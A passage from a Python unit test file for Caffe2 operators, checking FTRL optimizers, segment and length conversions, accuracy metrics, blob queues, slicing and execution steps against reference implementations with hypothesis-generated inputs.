n = np.abs(n)
nz = np.stack([n, z], axis=-1)
op = core.CreateOperator(
"Ftrl",
["var", "nz", "grad"],
["var" if in_place else "var_o",
"nz" if in_place else "nz_o"],
alpha=alpha, beta=beta, lambda1=lambda1, lambda2=lambda2,
engine=engine,
device_option=gc)
self.assertDeviceChecks(
dc, op, [var, nz, grad], [0])
self.assertReferenceChecks(
gc, op, [var, nz, grad],
partial(self._dense_ftrl, alpha, beta, lambda1, lambda2))
# Reference
@staticmethod
def _dense_gftrl(alpha, beta, lambda1, lambda2, w, nz, g):
if isinstance(alpha, np.ndarray):
alpha = np.asscalar(alpha)
old_shape = g.shape
n = np.take(nz, 0, axis=-1)
z = np.take(nz, 1, axis=-1)
output_dim = g.shape[0]
w = w.reshape(output_dim, -1)
g = g.reshape(output_dim, -1)
n = n.reshape(output_dim, -1)
z = z.reshape(output_dim, -1)
input_dim = g.shape[1]
g2 = g * g
sigma = (np.sqrt(n + g2) - np.sqrt(n)) / alpha
z += g - sigma * w
n += g2
z_norms = np.linalg.norm(z, 2, axis=0)
z_norms = z_norms + 1e-6
w = z * ((lambda1 * np.sqrt(output_dim)) / z_norms - 1) / \
((beta + np.sqrt(n)) / alpha + lambda2)
for i in range(input_dim):
if z_norms[i] <= lambda1 * np.sqrt(output_dim):
w[:, i] = 0
w = w.reshape(old_shape)
n = n.reshape(old_shape)
z = z.reshape(old_shape)
return (w, np.stack([n, z], axis=-1))
@given(inputs=hu.tensors(n=4),
in_place=st.booleans(),
alpha=st.floats(min_value=0.01, max_value=0.1),
beta=st.floats(min_value=0.1, max_value=0.9),
lambda1=st.floats(min_value=0.001, max_value=0.1),
lambda2=st.floats(min_value=0.001, max_value=0.1),
engine=st.sampled_from([None, "SIMD"]),
**hu.gcs_cpu_only)
def test_gftrl_sgd(self, inputs, in_place, alpha, beta, lambda1, lambda2,
engine, gc, dc):
var, n, z, grad = inputs
n = np.abs(n)
nz = np.stack([n, z], axis=-1)
op = core.CreateOperator(
"GFtrl",
["var", "nz", "grad"],
["var" if in_place else "var_o",
"nz" if in_place else "nz_o"],
alpha=alpha, beta=beta, lambda1=lambda1, lambda2=lambda2,
engine=engine,
device_option=gc)
self.assertDeviceChecks(
dc, op, [var, nz, grad], [0])
self.assertReferenceChecks(
gc, op, [var, nz, grad],
partial(self._dense_gftrl, alpha, beta, lambda1, lambda2))
@given(inputs=hu.tensors(n=4),
alpha=st.floats(min_value=0.01, max_value=0.1),
beta=st.floats(min_value=0.1, max_value=0.9),
lambda1=st.floats(min_value=0.001, max_value=0.1),
lambda2=st.floats(min_value=0.001, max_value=0.1),
engine=st.sampled_from([None, "SIMD"]),
**hu.gcs_cpu_only)
def test_sparse_ftrl_sgd(self, inputs, alpha, beta, lambda1, lambda2,
engine, gc, dc):
var, n, z, grad = inputs
# generate fake subset manually because hypothesis is too complicated :)
indices = np.arange(var.shape[0])
indices = indices[indices % 2 == 0]
grad = grad[indices]
n = np.abs(n)
nz = np.stack([n, z], axis=-1)
op = core.CreateOperator(
"SparseFtrl",
["var", "nz", "indices", "grad"],
["var", "nz"],
alpha=alpha, beta=beta, lambda1=lambda1, lambda2=lambda2,
engine=engine,
device_option=gc)
self.assertDeviceChecks(
dc, op, [var, nz, indices, grad], [0])
# Reference
def ftrl(w, nz, i, g):
sw, snz = self._dense_ftrl(alpha, beta, lambda1, lambda2,
w[i], nz[i], g)
w[i] = sw
nz[i] = snz
return (w, nz)
self.assertReferenceChecks(gc, op, [var, nz, indices, grad], ftrl)
# Reference
@staticmethod
def _dense_ftrl_send_alpha_by_input(beta, lambda1, lambda2, w, nz, g, alpha):
return TestOperators._dense_ftrl(alpha, beta, lambda1, lambda2, w, nz,
g)
@given(inputs=hu.tensors(n=4),
in_place=st.booleans(),
alpha=st.floats(min_value=0.01, max_value=0.1),
beta=st.floats(min_value=0.1, max_value=0.9),
lambda1=st.floats(min_value=0.001, max_value=0.1),
lambda2=st.floats(min_value=0.001, max_value=0.1),
engine=st.sampled_from([None, "SIMD"]),
**hu.gcs_cpu_only)
def test_ftrl_sgd_send_alpha_by_input(self, inputs, in_place, alpha, beta,
lambda1, lambda2, engine, gc, dc):
var, n, z, grad = inputs
n = np.abs(n)
nz = np.stack([n, z], axis=-1)
alpha = np.array(alpha).astype(np.float32)
op = core.CreateOperator(
"Ftrl",
["var", "nz", "grad", "alpha"],
["var" if in_place else "var_o",
"nz" if in_place else "nz_o"],
beta=beta, lambda1=lambda1, lambda2=lambda2,
engine=engine,
device_option=gc)
self.assertDeviceChecks(
dc, op, [var, nz, grad, alpha], [0])
self.assertReferenceChecks(
gc, op, [var, nz, grad, alpha],
partial(self._dense_ftrl_send_alpha_by_input, beta, lambda1, lambda2))
@given(inputs=hu.tensors(n=4),
alpha=st.floats(min_value=0.01, max_value=0.1),
beta=st.floats(min_value=0.1, max_value=0.9),
lambda1=st.floats(min_value=0.001, max_value=0.1),
lambda2=st.floats(min_value=0.001, max_value=0.1),
engine=st.sampled_from([None, "SIMD"]),
**hu.gcs_cpu_only)
def test_sparse_ftrl_sgd_send_alpha_by_input(self, inputs, alpha, beta,
lambda1, lambda2, engine, gc,
dc):
var, n, z, grad = inputs
# generate fake subset manually because hypothesis is too complicated :)
indices = np.arange(var.shape[0])
indices = indices[indices % 2 == 0]
grad = grad[indices]
n = np.abs(n)
nz = np.stack([n, z], axis=-1)
alpha = np.array(alpha).astype(np.float32)
op = core.CreateOperator(
"SparseFtrl",
["var", "nz", "indices", "grad", "alpha"],
["var", "nz"],
beta=beta, lambda1=lambda1, lambda2=lambda2,
engine=engine,
device_option=gc)
self.assertDeviceChecks(
dc, op, [var, nz, indices, grad, alpha], [0])
# Reference
def ftrl(w, nz, i, g, alpha):
sw, snz = self._dense_ftrl_send_alpha_by_input(beta, lambda1,
lambda2, w[i], nz[i],
g, alpha)
w[i] = sw
nz[i] = snz
return (w, nz)
self.assertReferenceChecks(gc, op, [var, nz, indices, grad, alpha],
ftrl)
# TODO: (bddppq) test_unique keeps running into segfault on rocm 1.8.2
@given(input=hu.tensor(max_value=20,
max_dim=1,
dtype=np.int32,
elements=st.integers(min_value=0, max_value=10)),
with_remapping=st.booleans(),
**hu.gcs_no_hip)
def test_unique(self, input, with_remapping, gc, dc):
op = core.CreateOperator(
"Unique",
["input"],
["unique"] + (["remapping"] if with_remapping else []),
device_option=gc)
self.assertDeviceChecks(dc, op, [input], [0])
# Validator
def unique_valid(input, unique, remapping=None):
self.assertEqual(unique.size, len(set(input)))
self.assertEqual(sorted(unique), sorted(set(input)))
if with_remapping:
self.assertEqual(remapping.shape, input.shape)
remapped = [unique[remapping[i]] for i in range(len(input))]
np.testing.assert_array_equal(remapped, input)
self.assertValidationChecks(gc, op, [input], unique_valid)
@given(prediction=hu.arrays(dims=[10, 3],
elements=st.floats(allow_nan=False,
allow_infinity=False,
min_value=0,
max_value=1)),
labels=hu.arrays(dims=[10],
dtype=np.int32,
elements=st.integers(min_value=0,
max_value=3 - 1)),
top_k=st.integers(min_value=1, max_value=3),
**hu.gcs)
def test_accuracy(self, prediction, labels, top_k, gc, dc):
if(top_k > 1):
gc = hu.cpu_do
op = core.CreateOperator(
"Accuracy",
["prediction", "labels"],
["accuracy"],
top_k=top_k,
device_option=gc
)
def op_ref(prediction, labels, top_k):
N = prediction.shape[0]
correct = 0
for i in range(0, len(prediction)):
pred_sorted = sorted(
([item, j] for j, item in enumerate(prediction[i])),
key=lambda x: x[0],
reverse=True
)
max_ids = [x[1] for x in pred_sorted[0:top_k]]
for m in max_ids:
if m == labels[i]:
correct += 1
accuracy = correct / N
return (accuracy,)
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=[prediction, labels, top_k],
reference=op_ref)
@given(target_probabilities=hu.arrays(
dims=[10], elements=st.floats(allow_nan=False,
allow_infinity=False,
min_value=0.01,
max_value=1)),
**hu.gcs)
def test_perplexity(self, target_probabilities, gc, dc):
op = core.CreateOperator(
"Perplexity",
["target_probabilities"],
["perplexity"]
)
def op_ref(target_probabilities):
N = target_probabilities.shape[0]
perplexities = np.power(target_probabilities, -1.0 / N)
perplexity = reduce(lambda x, y: x * y, perplexities)
return (perplexity,)
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=[target_probabilities],
reference=op_ref)
@given(lengths=st.lists(st.integers(min_value=0, max_value=10),
min_size=0,
max_size=10),
**hu.gcs_cpu_only)
def test_lengths_to_segment_ids(self, lengths, gc, dc):
op = core.CreateOperator(
"LengthsToSegmentIds",
["lengths"],
["segment_ids"])
def op_ref(lengths):
sids = []
for i, l in enumerate(lengths):
sids.extend(l * [i])
return (np.array(sids, dtype=np.int32), )
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=[np.array(lengths, dtype=np.int32)],
reference=op_ref)
@given(lengths=st.lists(st.integers(min_value=0, max_value=10),
min_size=0,
max_size=10),
**hu.gcs_cpu_only)
def test_lengths_range_fill(self, lengths, gc, dc):
op = core.CreateOperator(
"LengthsRangeFill",
["lengths"],
["increasing_seq"])
def op_ref(lengths):
sids = []
for _, l in enumerate(lengths):
sids.extend(list(range(l)))
return (np.array(sids, dtype=np.int32), )
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=[np.array(lengths, dtype=np.int32)],
reference=op_ref)
@given(**hu.gcs_cpu_only)
def test_segment_ids_to_ranges(self, gc, dc):
lengths = [4, 6, 3, 2, 0, 4]
op = core.CreateOperator(
"SegmentIdsToRanges",
["segment_ids"],
["ranges"])
def op_ref(segment_ids):
ranges = [np.array([0, 0], dtype=np.int32)]
prev = 0
for i, sid in enumerate(segment_ids):
while sid != prev:
prev += 1
ranges.append(np.array([i, 0], dtype=np.int32))
ranges[-1][1] += 1
return (np.array(ranges, dtype=np.int32), )
def lengths_to_segment_ids(lengths):
sids = []
for i, l in enumerate(lengths):
sids.extend(l * [i])
return (np.array(sids, dtype=np.int32), )
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=np.array(lengths_to_segment_ids(lengths), dtype=np.int32),
reference=op_ref)
@given(lengths=st.lists(st.integers(min_value=0, max_value=10),
min_size=0,
max_size=10),
**hu.gcs_cpu_only)
def test_lengths_to_ranges(self, lengths, gc, dc):
op = core.CreateOperator(
"LengthsToRanges",
["lengths"],
["ranges"])
def op_ref(x):
if not x.size:
return (x.reshape((0, 2)), )
return (np.column_stack((np.concatenate(([0], np.cumsum(x)[:-1])),
x)), )
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=[np.array(lengths, dtype=np.int32)],
reference=op_ref)
@given(prediction=hu.arrays(dims=[10, 3],
elements=st.floats(allow_nan=False,
allow_infinity=False,
min_value=0,
max_value=1)),
labels=hu.arrays(dims=[10],
dtype=np.int32,
elements=st.integers(min_value=0,
max_value=3 - 1)),
**hu.gcs)
def test_multi_class_accuracy(self, prediction, labels, gc, dc):
op = core.CreateOperator(
"MultiClassAccuracy",
["prediction", "labels"],
["accuracies", "amounts"]
)
def op_ref(prediction, labels):
N = prediction.shape[0]
D = prediction.shape[1]
accuracies = np.empty(D, dtype=float)
accuracies.fill(0)
amounts = np.empty(D, dtype=int)
amounts.fill(0)
max_ids = np.argmax(prediction, axis=1)
for i in range(0, N):
max_id = max_ids[i]
label_id = labels[i]
if max_id == label_id:
accuracies[label_id] += 1
amounts[label_id] += 1
for i in range(0, D):
amount = amounts[i]
if amount:
accuracies[i] /= amount
return (accuracies, amounts,)
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=[prediction, labels],
reference=op_ref)
@given(lengths=st.lists(st.integers(min_value=0, max_value=10),
min_size=0,
max_size=10),
**hu.gcs_cpu_only)
def test_segment_ids_to_lengths(self, lengths, gc, dc):
op = core.CreateOperator(
"SegmentIdsToLengths",
["segment_ids"],
["lengths"])
def lengths_to_ids(lengths):
sids = []
for i, l in enumerate(lengths):
sids.extend(l * [i])
return sids
segment_ids = lengths_to_ids(lengths)
def ids_to_lengths(ids):
ids_length = len(ids)
if ids_length == 0:
return (np.array([], dtype=np.int32),)
lengths = []
# segment id starts with 0
prev_id = -1
tmp_length = 0
for idx in range(ids_length):
cur_id = ids[idx]
if cur_id != prev_id:
if idx != 0:
lengths.append(tmp_length)
while prev_id + 1 != cur_id:
lengths.append(0)
prev_id += 1
prev_id = cur_id
tmp_length = 0
tmp_length += 1
lengths.append(tmp_length)
return (np.array(lengths, dtype=np.int32),)
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=[np.array(segment_ids, dtype=np.int32)],
reference=ids_to_lengths)
@given(lengths=st.lists(st.integers(min_value=1, max_value=10),
min_size=0,
max_size=10),
power=st.sampled_from([0.5, 1.0, 1.5, 2.0]),
**hu.gcs_cpu_only)
def test_lengths_to_weights(self, lengths, power, gc, dc):
op = core.CreateOperator(
"LengthsToWeights",
["lengths"],
["weights"],
power=power)
def lengths_to_weights(lengths):
weighted_length = []
for l in lengths:
weighted_length.extend(l * [1 / pow(l, power)])
return (np.array(weighted_length, dtype=float),)
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=[np.array(lengths, dtype=np.int32)],
reference=lengths_to_weights)
@given(input_tensor=hu.arrays(
dims=[10], elements=st.floats(allow_nan=False,
allow_infinity=False)),
**hu.gcs)
def test_abs(self, input_tensor, gc, dc):
op = core.CreateOperator(
"Abs",
["input"],
["output"]
)
def abs_ref(input_tensor):
return (np.abs(input_tensor),)
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=[input_tensor],
reference=abs_ref)
@given(input_tensor=hu.arrays(
dims=[10], elements=st.floats(min_value=-10,
max_value=10)),
**hu.gcs)
def test_cos(self, input_tensor, gc, dc):
op = core.CreateOperator(
"Cos",
["input"],
["output"]
)
def cos_ref(input_tensor):
return (np.cos(input_tensor),)
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=[input_tensor],
reference=cos_ref)
@given(input_tensor=hu.arrays(
dims=[10], elements=st.floats(min_value=-10,
max_value=10)),
**hu.gcs)
def test_sin(self, input_tensor, gc, dc):
op = core.CreateOperator(
"Sin",
["input"],
["output"]
)
def sin_ref(input_tensor):
return (np.sin(input_tensor),)
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=[input_tensor],
reference=sin_ref)
@given(input_tensor=hu.arrays(
dims=[10], elements=st.floats(allow_nan=False,
allow_infinity=False)),
**hu.gcs)
def test_exp(self, input_tensor, gc, dc):
op = core.CreateOperator(
"Exp",
["input"],
["output"]
)
def exp_ref(input_tensor):
return (np.exp(input_tensor),)
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=[input_tensor],
reference=exp_ref)
@given(input_tensor=hu.arrays(
dims=[10], elements=st.floats(min_value=1,
max_value=10000)),
**hu.gcs_cpu_only)
def test_log(self, input_tensor, gc, dc):
op = core.CreateOperator(
"Log",
["input"],
["output"]
)
def log_ref(input_tensor):
return (np.log(input_tensor),)
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=[input_tensor],
reference=log_ref)
self.assertGradientChecks(gc, op, [input_tensor], 0, [0])
def test_blobs_dequeue_timeout(self):
op = core.CreateOperator(
"CreateBlobsQueue",
[],
["queue"],
capacity=5,
num_blobs=1)
self.ws.run(op)
t = time.time()
op = core.CreateOperator(
"DequeueBlobs",
["queue"],
["out"],
timeout_secs=0.2)
self.assertRaises(RuntimeError, lambda: self.ws.run(op))
t = time.time() - t
self.assertGreater(t, 0.19)
@given(num_threads=st.integers(1, 10), # noqa
num_elements=st.integers(1, 100),
capacity=st.integers(1, 5),
num_blobs=st.integers(1, 3),
do=st.sampled_from(hu.device_options))
def test_blobs_queue_threading(self, num_threads, num_elements,
capacity, num_blobs, do):
"""
- Construct matrices of size N x D
- Start K threads
- Push all N rows into the queue of capacity C
- Pull all N rows out of the queue.
- Verify that the output matrices are permutation of the rows of the
original matrices.
"""
import threading
try:
import queue
except ImportError:
# Py3
import Queue as queue
op = core.CreateOperator(
"CreateBlobsQueue",
[],
["queue"],
capacity=capacity,
num_blobs=num_blobs,
device_option=do)
self.ws.run(op)
xs = [np.random.randn(num_elements, 5).astype(np.float32)
for _ in range(num_blobs)]
q = queue.Queue()
for i in range(num_elements):
q.put([x[i] for x in xs])
def enqueue(t):
while True:
feed_blobs = ["x_{}_{}".format(i, t) for i in range(num_blobs)]
op = core.CreateOperator(
"EnqueueBlobs",
["queue"] + feed_blobs,
feed_blobs,
device_option=do)
try:
elems = q.get_nowait()
for elem, feed_blob in zip(elems, feed_blobs):
self.ws.create_blob(feed_blob).feed(
elem, device_option=do)
self.ws.run(op)
except queue.Empty:
return
# Create all blobs before racing on multiple threads
# (blob creation is not threadsafe)
for t in range(num_threads):
for i in range(num_blobs):
self.ws.create_blob("x_{}_{}".format(i, t))
threads = [threading.Thread(target=enqueue, args=(t,))
for t in range(num_threads)]
for thread in threads:
thread.start()
for n in range(num_elements):
dequeue_blobs = ["y_{}_{}".format(i, n) for i in range(num_blobs)]
op = core.CreateOperator(
"DequeueBlobs",
["queue"],
dequeue_blobs,
device_option=do)
self.ws.run(op)
for thread in threads:
thread.join()
op = core.CreateOperator("CloseBlobsQueue", ["queue"], [])
self.ws.run(op)
ys = [np.vstack([self.ws.blobs["y_{}_{}".format(i, n)].fetch()
for n in range(num_elements)])
for i in range(num_blobs)]
for i in range(num_blobs):
self.assertEqual(ys[i].shape, xs[i].shape)
for j in range(num_elements):
# Verify that the rows of the returned blob are a
# permutation. The order may be different due to
# different threads racing.
self.assertTrue(
any(np.array_equal(xs[i][j], ys[i][k])
for k in range(num_elements)))
@given(num_producers=st.integers(1, 10),
num_consumers=st.integers(1, 10),
capacity=st.integers(1, 5),
num_blobs=st.integers(1, 3),
do=st.sampled_from(hu.device_options))
def test_safe_blobs_queue(self, num_producers, num_consumers,
capacity, num_blobs, do):
init_net = core.Net('init_net')
queue = init_net.CreateBlobsQueue(
[], 1, capacity=capacity, num_blobs=num_blobs)
producer_steps = []
truth = 0
for i in range(num_producers):
name = 'producer_%d' % i
net = core.Net(name)
blobs = [net.ConstantFill([], 1, value=1.0, run_once=False)
for times in range(num_blobs)]
status = net.NextName()
net.SafeEnqueueBlobs([queue] + blobs, blobs + [status])
count = (i + 1) * 10
step = core.execution_step(name, net, num_iter=count)
truth += count
producer_steps.append(step)
producer_exit_net = core.Net('producer_exit_net')
producer_exit_net.CloseBlobsQueue([queue], 0)
producer_step = core.execution_step('producer', [
core.execution_step(
'producers', producer_steps, concurrent_substeps=True),
core.execution_step('producer_exit', producer_exit_net)]
)
consumer_steps = []
counters = []
const_1 = init_net.ConstantFill([], 1, value=1.0)
for i in range(num_consumers):
name = 'consumer_%d' % i
net1 = core.Net(name)
blobs = net1.SafeDequeueBlobs([queue], num_blobs + 1)
status = blobs[-1]
net2 = core.Net(name + '_counter')
counter = init_net.ConstantFill([], 1, value=0.0)
counters.append(counter)
net2.Add([counter, const_1], counter)
consumer_steps.append(core.execution_step(
name, [net1, net2], should_stop_blob=status))
consumer_step = core.execution_step(
'consumer', consumer_steps, concurrent_substeps=True)
init_step = core.execution_step('init', init_net)
worker_step = core.execution_step(
'worker', [consumer_step, producer_step], concurrent_substeps=True)
plan = core.Plan('test')
plan.AddStep(init_step)
plan.AddStep(worker_step)
self.ws.run(plan)
v = 0
for counter in counters:
v += self.ws.blobs[str(counter)].fetch().tolist()
self.assertEqual(v, truth)
@given(num_queues=st.integers(1, 5),
num_iter=st.integers(5, 10),
capacity=st.integers(1, 5),
num_blobs=st.integers(1, 3))
def test_weighted_sample_blobs_queue(
self, num_queues, num_iter, capacity, num_blobs
):
# Create BlobsQueue for each input queue
print("num_queues", num_queues)
init_net = core.Net('init_net')
queues = [
init_net.CreateBlobsQueue(
[], 1, capacity=capacity, num_blobs=num_blobs
) for _ in range(num_queues)
]
# Create multiple producer nets and one producer exist net
producer_steps = []
producer_exit_nets = []
for i in range(num_queues):
name = 'producer_%d' % i
net = core.Net(name)
blobs = [net.ConstantFill([], 1, value=1.0, run_once=False)
for _ in range(num_blobs)]
status = net.NextName()
net.SafeEnqueueBlobs([queues[i]] + blobs, blobs + [status])
exit_net = core.Net('producer_exit_%d' % i)
exit_net.CloseBlobsQueue(queues[i], 0)
producer_exit_nets.append(exit_net)
step = core.execution_step(
name, [
core.execution_step(
'producer_%d' % i, [net], num_iter=num_iter
),
core.execution_step('producer_exit_%d' % i, [exit_net]),
]
)
producer_steps.append(step)
producer_step = core.execution_step(
'producer', [
core.execution_step(
'producers',
producer_steps,
concurrent_substeps=True,
),
]
)
status_lst = []
def append(ins, outs):
status_lst.append(ins)
# Create one consumer dequeue net and one consumer exist net
consumer_net = core.Net('weight_sample_dequeue_net')
table_idx_blob = np.random.randint(low=-1, high=num_blobs, size=1)
blobs = consumer_net.WeightedSampleDequeueBlobs(
queues,
num_blobs + 1,
weights=np.random.uniform(low=0.0, high=1.0, size=(num_queues,)),
table_idx_blob=table_idx_blob[0],
)
status = blobs[-1]
consumer_net.Python(append)(status)
consumer_step = core.execution_step(
'consumer',
[
core.execution_step(
'consumer', [consumer_net], should_stop_blob=status
),
core.execution_step('producer_exit', producer_exit_nets)
]
)
init_step = core.execution_step('init', init_net)
worker_step = core.execution_step(
'worker', [producer_step, consumer_step], concurrent_substeps=True)
plan = core.Plan('test')
plan.AddStep(init_step)
plan.AddStep(worker_step)
self.ws.run(plan)
assert len(status_lst) >= num_iter + 1
assert len(status_lst) <= num_iter * num_queues + 1
@given(
data=hu.tensor(),
**hu.gcs_cpu_only)
def test_squeeze_expand_dims(self, data, gc, dc):
dims = [0, 0]
if len(data.shape) > 2:
dims.append(2)
op = core.CreateOperator(
"ExpandDims",
["data"],
["expanded"],
dims=dims)
def expand_dims_ref(data, *args, **kw):
inc_dims = list(set(dims))
inc_dims.sort()
r = data
for dim in inc_dims:
r = np.expand_dims(r, axis=dim)
return (r, )
def squeeze_ref(data, *args, **kw):
dec_dims = list(set(dims))
dec_dims.sort(reverse=True)
r = data
for dim in dec_dims:
r = np.squeeze(r, axis=dim)
return (r, )
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=[data],
reference=expand_dims_ref,
output_to_grad='expanded',
grad_reference=squeeze_ref)
@given(**hu.gcs_cpu_only)
def test_tt_layer(self, gc, dc):
seed = 1234
np.random.seed(seed)
inp_sizes = [2, 2, 2, 2]
out_sizes = [2, 2, 2, 2]
tt_ranks = [1, 3, 3, 3, 1]
op = core.CreateOperator(
"TT",
["X", "b", "cores"],
["Y"],
inp_sizes=inp_sizes,
out_sizes=out_sizes,
tt_ranks=tt_ranks,
)
X = np.expand_dims(
np.random.rand(16).astype(np.float32), axis=0)
b = np.array([0] * 16).astype(np.float32)
cores = tt_core.init_tt_cores(inp_sizes, out_sizes, tt_ranks)
self.ws.create_blob("X").feed(X)
self.ws.create_blob("b").feed(b)
self.ws.create_blob("cores").feed(cores)
self.ws.run(op)
Y = self.ws.blobs[("Y")].fetch()
Y = Y.reshape([16])
golden = np.array([-9.51763490e-07, -1.28442286e-06,
-2.86281141e-07, 2.28865644e-07,
-1.96180017e-06, -1.78920531e-06,
9.31094666e-07, -2.04273989e-07,
1.70017107e-06, 1.64845711e-06,
-1.06099132e-06, -4.69111137e-07,
6.57552358e-08, -1.28942040e-08,
-2.29114004e-07, -1.04262714e-06])
# This golden array is dependent on the specified inp_sizes, out_sizes,
# tt_ranks, and seed. Changing these will cause the test to fail.
self.assertAlmostEqual(np.linalg.norm(golden - Y), 0, delta=1e-10)
@given(num_workers=st.integers(1, 10),
net_type=st.sampled_from(
["simple", "dag"] +
(["async_dag"] if workspace.has_gpu_support else [])),
# This test is flaky on rocm caused by race condition in
# hcc HSAQueue, the fix will be coming in rocm 2.2 (see
# https://github.com/pytorch/pytorch/issues/16229
**hu.gcs_no_hip)
def test_dag_net_forking(self, net_type, num_workers, gc, dc):
from caffe2.python.model_helper import ModelHelper
from caffe2.python import brew
m = ModelHelper(name="test_model")
n = 10
d = 2
depth = 2
iters = 5
np.random.seed(1701)
# Build a binary tree of FC layers, summing at each node.
for i in reversed(range(depth)):
for j in range(2 ** i):
bottom_1 = "{}_{}".format(i + 1, 2 * j)
bottom_2 = "{}_{}".format(i + 1, 2 * j + 1)
mid_1 = "{}_{}_m".format(i + 1, 2 * j)
mid_2 = "{}_{}_m".format(i + 1, 2 * j + 1)
top = "{}_{}".format(i, j)
brew.fc(
m,
bottom_1, mid_1,
dim_in=d, dim_out=d,
weight_init=('ConstantFill', dict(value=np.random.randn())),
bias_init=('ConstantFill', dict(value=np.random.randn())))
brew.fc(
m,
bottom_2, mid_2,
dim_in=d, dim_out=d,
weight_init=('ConstantFill', dict(value=np.random.randn())),
bias_init=('ConstantFill', dict(value=np.random.randn())))
m.net.Sum([mid_1, mid_2], top)
m.net.SquaredL2Distance(["0_0", "label"], "xent")
m.net.AveragedLoss("xent", "loss")
input_to_grad = m.AddGradientOperators(["loss"])
m.Proto().device_option.CopyFrom(gc)
m.param_init_net.Proto().device_option.CopyFrom(gc)
m.Proto().type = net_type
m.Proto().num_workers = num_workers
self.ws.run(m.param_init_net)
print(str(m.Proto()))
def run():
import numpy as np
np.random.seed(1701)
input_blobs = ["{}_{}".format(depth, j) for j in range(2 ** depth)]
for input_blob in input_blobs:
self.ws.create_blob(input_blob).feed(
np.random.randn(n, d).astype(np.float32),
device_option=gc)
self.ws.create_blob("label").feed(
np.random.randn(n, d).astype(np.float32),
device_option=gc)
self.ws.run(m.net)
gradients = [
self.ws.blobs[str(input_to_grad[input_blob])].fetch()
for input_blob in input_blobs]
return gradients
outputs = [run() for _ in range(iters)]
for output in outputs[1:]:
np.testing.assert_array_equal(outputs[0], output)
self.assertAlmostEqual(np.sum(np.square(output)), 91.81752,
delta=1e-2)
@given(input=hu.tensor(min_dim=2, max_dim=6, dtype=np.int32,
elements=st.integers(min_value=0,
max_value=2**32 - 1)),
slice_dim=st.integers(),
a=st.integers(),
b=st.integers(),
is_empty=st.booleans(),
**hu.gcs_cpu_only)
def test_slice(self, input, slice_dim, a, b, is_empty, gc, dc):
slice_dim = slice_dim % len(input.shape)
if (is_empty):
input = np.random.rand(*([0] + list(input.shape))).astype(np.int32)
slice_dim += 1
a = a % input.shape[slice_dim]
b = b % input.shape[slice_dim] + 1
start_vec = np.zeros(len(input.shape), dtype=np.int32)
end_vec = np.ones(len(input.shape), dtype=np.int32) * -1
start_vec[slice_dim] = min(a, b)
end_vec[slice_dim] = max(a, b)
op = core.CreateOperator(
"Slice",
["input", "start", "end"],
["output"])
def slice_ref(x, s, e):
if len(s.shape) == 0:
return x
slc = [slice(si, None if ei == -1 else ei) for si, ei in zip(s, e)]
return (x[slc], )
self.assertReferenceChecks(gc, op, [input, start_vec, end_vec],
slice_ref)
@given(data=hu.tensor(), **hu.gcs_cpu_only)
def test_shape(self, data, gc, dc):
op = core.CreateOperator("Shape", ["data"], ["shape"])
self.assertReferenceChecks(gc, op, [data], lambda x: (x.shape, ))
@given(data=hu.tensor(), **hu.gcs_cpu_only)
def test_shape_with_axes(self, data, gc, dc):
def shape_ref(x, y):
return ([x.shape[i] for i in y],)
axes = np.random.randint(len(data.shape), size=10).tolist()
op = core.CreateOperator("Shape", ["data"], ["shape"], axes=axes)
self.assertReferenceChecks(gc, op, [data, axes], shape_ref)
@given(data=hu.tensor(), **hu.gcs_cpu_only)
def test_has_elements(self, data, gc, dc):
op = core.CreateOperator("HasElements", ["data"], ["has_elements"])
self.assertReferenceChecks(gc, op, [data], lambda x: (len(x) > 0, ))
op = core.CreateOperator("IsEmpty", ["data"], ["is_empty"])
self.assertReferenceChecks(gc, op, [data], lambda x: (len(x) == 0, ))
@given(initial_iters=st.integers(0, 100),
max_iters=st.integers(0, 100))
def test_should_stop_as_criteria_net_execution_step(
self, initial_iters, max_iters):
net = core.Net("net")
net.Iter(["iter"], ["iter"])
self.ws.create_blob("iter").feed(
np.asarray([initial_iters]).astype(np.int64))
self.ws.create_blob("num_iters").feed(
np.asarray([max_iters]).astype(np.int64))
criteria_net = core.Net("criteria")
criteria_net.GE(["iter", "num_iters"], ["stop"])
criteria_net.Proto().external_output.extend(["stop"])
plan = core.Plan('plan')
plan.AddStep(core.execution_step(
'step', [criteria_net, net],
should_stop_blob=core.BlobReference("stop")))
self.ws.run(plan)
iters = self.ws.blobs[("iter")].fetch()
self.assertEqual(iters.dtype, np.int64)
self.assertEqual(iters[0], max(initial_iters, max_iters))
def test_disabled_execution_step(self):
def createNets(i, disabled):
should_stop = 'should_stop_{}'.format(i)
output = 'output_{}'.format(i)
# init content and stop signal
init = core.Net("init_{}".format(i))
init.ConstantFill(
[],
[output],
shape=[1],
value=0.0
)
init.Cast([output], [should_stop], to='bool')
# decide if disabled or not
criterion = core.Net("criterion_{}".format(i))
tmp = criterion.ConstantFill(
[],
shape=[1],
value=1.0 if disabled else 0.0
)
criterion.Cast([tmp], [should_stop], to='bool')
criterion.Proto().external_output.extend([should_stop])
# the body net is just to turn a 0 blob to 1
net = core.Net("net_{}".format(i))
net.ConstantFill(
[],
[output],
shape=[1],
value=1.0
)
# always end the loop
ender = core.Net("ender_{}".format(i))
tmp = ender.ConstantFill(
[],
shape=[1],
value=1.0
)
ender.Cast([tmp], [should_stop], to='bool')
ender.Proto().external_output.extend([should_stop])
return [init, criterion, net, ender]
nets = [createNets(1, False),
createNets(2, True),
createNets(3, False)]
steps = [
core.execution_step(
'step_1', nets[0],
should_stop_blob=core.BlobReference('should_stop_1')),
core.execution_step(
'step_2', nets[1],
should_stop_blob=core.BlobReference('should_stop_2')),
core.execution_step('step_3', nets[2])
]
expected = [1.0, 0.0, 1.0]
plan = core.Plan('plan')
plan.AddStep(core.execution_step('all_steps', steps, num_iter=3))
self.ws.run(plan)
for i, _ in enumerate(nets):
self.assertEqual(
